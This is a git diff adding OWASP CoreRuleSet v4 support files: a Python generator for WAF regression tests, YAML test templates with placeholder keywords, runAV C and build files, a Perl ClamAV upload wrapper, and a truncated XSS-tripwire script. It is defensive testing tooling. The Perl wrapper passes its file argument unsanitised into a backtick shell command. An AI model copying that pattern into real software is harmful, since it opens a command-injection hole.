+parser.add_argument('-s', action='store', dest='skeleton', help='Skeleton file', + default='positivetest.yaml.skeleton') +parser.add_argument('-o', action='store', dest='output', help='output file', + default='') +parser.add_argument('-r', action='store', dest='ruleid', help='Rule id', + default='944310') +parser.add_argument('-k', action='store', dest='combined_payload', help='Keyword containing combined pipe separated payloads', + default='') +parser.add_argument('-i', action='append', dest='list_payload', help='Keyword containing individual payload', + default=[]) +parser.add_argument('-c', action='store', dest='prefix', help='Prefix keyword for all payloads', + default='') +parser.add_argument('-e', action='store', dest='sufix', help='Sufix keyword for all payloads', + default='') +parser.add_argument('-b', action='store_true', dest='base64encode', help='Encode payload using Base64', + default=False) +parser.add_argument('-d', action='store_true', dest='demo', help='Print demo rules if no data is provided', + default=False) +parser.add_argument('-t', action='store_true', dest='test', help='Launch FTW and test output', + default=False) +parser.add_argument('-w', action='store', dest='author', help='Test author', + default='spartantri') +start_options = parser.parse_args() + +if len(sys.argv)<2 and not start_options.demo: + parser.print_usage() + exit() + +for p in start_options.combined_payload.split('|'): + if p not in payloads: + # print('Checking %s' % (p)) + if len(p)>0: + payloads.append(''.join([start_options.prefix, p, start_options.sufix])) + +for p in start_options.list_payload: + payloads.append(''.join([start_options.prefix, p, start_options.sufix])) + +if start_options.output=='': + o=sys.stdout +else: + o=open(start_options.output, 'w') + +o.write(Meta.replace('skeletonid', start_options.ruleid).replace('spartantri', start_options.author)) +for item in payloads: + if start_options.base64encode: + payload=base64.encodestring(item).replace('\n', '') + #print payload + else: + payload=item + with open(start_options.skeleton,'r') as f: + for l in f: + l=l.replace('skeletonid', start_options.ruleid) + l=l.replace('skeletonkeyword', payload) + l=l.replace('skeletondefaultaddr', start_options.Addr) + l=l.replace('skeletondefaultport', start_options.Port) + l=l.replace('skeletondefaulthost', start_options.Host) + l=l.replace('skeletondefaultuseragent', UserAgent) + l=l.replace('skeletondefaultacceptcharset', AcceptCharset) + l=l.replace('skeletondefaultacceptencoding', AcceptEncoding) + l=l.replace('skeletondefaultacceptlanguage', AcceptLanguage) + l=l.replace('skeletondefaultcontenttype', ContentType) + l=l.replace('skeletondefaultaccept', Accept) + if 'skeletontest' in l: + l=l.replace('skeletontest', str(skeletontest)) + skeletontest+=1 + o.write(l) + +if start_options.output != '': + print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output)) + o.close() + +#print('\nGenerated %s tests' % (str(skeletontest))) diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest-light.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest-light.yaml.skeleton new file mode 100644 index 000000000..65ca49569 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest-light.yaml.skeleton @@ -0,0 +1,255 @@ + - + test_title: skeletonid-skeletontest + desc: "Argument test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Argument name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Request header test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Nested XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type text/plain includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest.yaml.skeleton new file mode 100644 index 000000000..83f0b2dee --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest.yaml.skeleton @@ -0,0 +1,393 @@ + - + test_title: skeletonid-skeletontest + desc: "Argument test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Argument name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Request header test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Nested XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type text/plain includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/utils/data/popularUAs.data b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/data/popularUAs.data similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/utils/data/popularUAs.data rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/data/popularUAs.data diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testSampling.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testSampling.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testSampling.py rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testSampling.py diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testUserAgents.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testUserAgents.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testUserAgents.py rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testUserAgents.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/APPROVED_TAGS b/src/common/core/modsecurity/files/coreruleset-v4/util/APPROVED_TAGS similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/APPROVED_TAGS rename to src/common/core/modsecurity/files/coreruleset-v4/util/APPROVED_TAGS diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/README b/src/common/core/modsecurity/files/coreruleset-v4/util/README new file mode 100644 index 000000000..d9aa66ddd --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/README @@ -0,0 +1,7 @@ +The util directory contains many supporting tools/scripts that may be used with +the OWASP ModSecurity CRS files. + +Docker Support +============== +A Dockerfile can be found in the docker/ directory, along with additional +notes in docker/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.c b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.c similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.c rename to src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.c diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.h b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.h new file mode 100755 index 000000000..da4941071 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.h @@ -0,0 +1,99 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAX_PARAMS 256 +#define MAX_IPS 256 +#define MAX_NAME_LENGTH 256 +#define MAX_VALUE_LENGTH 1024 +#define MAX_CMD_LENGTH 1024 +#define MAX_TOKEN_LENGTH 1024 +#define MAX_OUTPUT_LINE_LEN (1024) +#define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) +#define WHITE 1 +#define BLACK 0 +#define NONE 0 +#define DEBUG 1 + +typedef struct { + char name[MAX_NAME_LENGTH]; + char value[MAX_VALUE_LENGTH]; +} parameter_t; + +typedef struct { + char ip[16]; + time_t start; + long duration; + time_t end; + char token[MAX_TOKEN_LENGTH]; +} blocklist_t; + +EXTERN int lock_file(char *filename); +EXTERN int unlock_file(int fd); +EXTERN int print_reply(char *reply); +EXTERN int print_error(char *func1, char* func2, char* str, int err); +EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int is_proxy_up(); +EXTERN int run_cmd(char *command, char *output, int output_size); +EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); +EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); +EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters); +EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); +EXTERN int copy_file(char *src_file, char *dst_file); +EXTERN int change_file(char *filename, parameter_t parameter); +EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); +EXTERN int init_cgi(); +EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); +EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); +EXTERN int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); + +EXTERN char modsec_rpc[1024]; +EXTERN char modsec_rpc_home[1024]; +EXTERN char modsec_rpc_log_file[1024]; +EXTERN char modsec_rpc_log_level[1024]; +EXTERN char modsec_rpc_ssl_lockfile[1024]; +EXTERN char modsec_rpc_externalnic_lockfile[1024]; +EXTERN char modsec_rpc_sensor_lockfile[1024]; +EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; +EXTERN char modsec_rpc_mui_lockfile[1024]; +EXTERN char modsec_proxy[1024]; +EXTERN char modsec_proxy_home[1024]; +EXTERN char modsec_proxy_script[1024]; +EXTERN char modsec_proxy_ip[1024]; +EXTERN char modsec_proxy_port[1024]; +EXTERN char modsec_proxy_bin[1024]; +EXTERN char modsec_proxy_conf[1024]; +EXTERN char modsec_proxy_ext_nic[1024]; +EXTERN char modsec_proxy_pid[1024]; +EXTERN char modsec_proxy_whitelist[1024]; +EXTERN char modsec_proxy_blacklist[1024]; +EXTERN char modsec_proxy_network_prefix[1024]; +EXTERN char modsec_proxy_timeout[1024]; +EXTERN char modsec_proxy_exchange[1024]; +EXTERN char modsec_proxy_ext_ips[1024]; +EXTERN char modsec_rpc_password_file[1024]; +EXTERN char modsec_mui_ui_admin[1024]; +EXTERN char modsec_mui_ui_ipaddress[1024]; +EXTERN char modsec_mui_ui_port[1024]; +EXTERN char modsec_cli_home[1024]; +EXTERN char sensor_id[1024]; +EXTERN char serial[1024]; +EXTERN char version_number[1024]; +EXTERN char bridge_mode[1024]; +EXTERN char data_disk_space[1024]; +EXTERN char release_date[1024]; +EXTERN char conn_rate[1024]; +EXTERN char conn_rate_per_addr[1024]; +EXTERN char conns[1024]; +EXTERN char conns_per_addr[1024]; diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/comp b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/comp new file mode 100755 index 000000000..aeee5db5e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/comp @@ -0,0 +1,2 @@ +gcc -c -o common.o -DEXTERN= common.c +gcc -o runAV -DEXTERN=extern common.o runAV.c diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV-clamd.c b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV-clamd.c similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV-clamd.c rename to src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV-clamd.c diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV.c b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV.c similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV.c rename to src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV.c diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runav.pl b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runav.pl new file mode 100755 index 000000000..c05fbf2ae --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runav.pl @@ -0,0 +1,40 @@ +#!/usr/bin/perl +# +# runav.pl +# Copyright (c) 2004-2011 Trustwave +# +# This script is an interface between ModSecurity and its +# ability to intercept files being uploaded through the +# web server, and ClamAV + + +$CLAMSCAN = "clamscan"; + +if ($#ARGV != 0) { + print "Usage: modsec-clamscan.pl \n"; + exit; +} + +my ($FILE) = shift @ARGV; + +$cmd = "$CLAMSCAN --stdout --disable-summary $FILE"; +$input = `$cmd`; +$input =~ m/^(.+)/; +$error_message = $1; + +$output = "0 Unable to parse clamscan output [$1]"; + +if ($error_message =~ m/: Empty file\.?$/) { + $output = "1 empty file"; +} +elsif ($error_message =~ m/: (.+) ERROR$/) { + $output = "0 clamscan: $1"; +} +elsif ($error_message =~ m/: (.+) FOUND$/) { + $output = "0 clamscan: $1"; +} +elsif ($error_message =~ m/: OK$/) { + $output = "1 clamscan: OK"; +} + +print "$output\n"; diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/browser-tools/js-overrides.js b/src/common/core/modsecurity/files/coreruleset-v4/util/browser-tools/js-overrides.js new file mode 100644 index 000000000..34d501779 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/browser-tools/js-overrides.js @@ -0,0 +1,78 @@ +(function() { // don't leak XSSTripwire into global ns + + /* + Assumptions: + - we need to run first, before any other attacker script + - we can't prevent tripwire from being detected (e.g. by side effects) + Todo: + - a lot more in lockdown + - protect XHR + */ + var XSSTripwire = new Object(); + + XSSTripwire.report = function() { + // Notify server + var notify = XSSTripwire.newXHR(); + + // Create a results string to send back + var results; + try { + results = "HTML=" + encodeURIComponent(document.body.outerHTML); + } catch (e) {} // we don't always have document.body + + notify.open("POST", XSSTripwire.ReportURL, true); + notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); + notify.send(results); + } + + XSSTripwire.lockdown = function(obj, name) { + if (Object.defineProperty) { + Object.defineProperty(obj, name, { + configurable: false + }) + } + } + + XSSTripwire.newXHR = function() { + var xmlreq = false; + if (window.XMLHttpRequest) { + xmlreq = new XMLHttpRequest(); + } else if (window.ActiveXObject) { + // Try ActiveX + try { + xmlreq = new ActiveXObject("Msxml2.XMLHTTP"); + } catch (e1) { + // first method failed + try { + xmlreq = new ActiveXObject("Microsoft.XMLHTTP"); + } catch 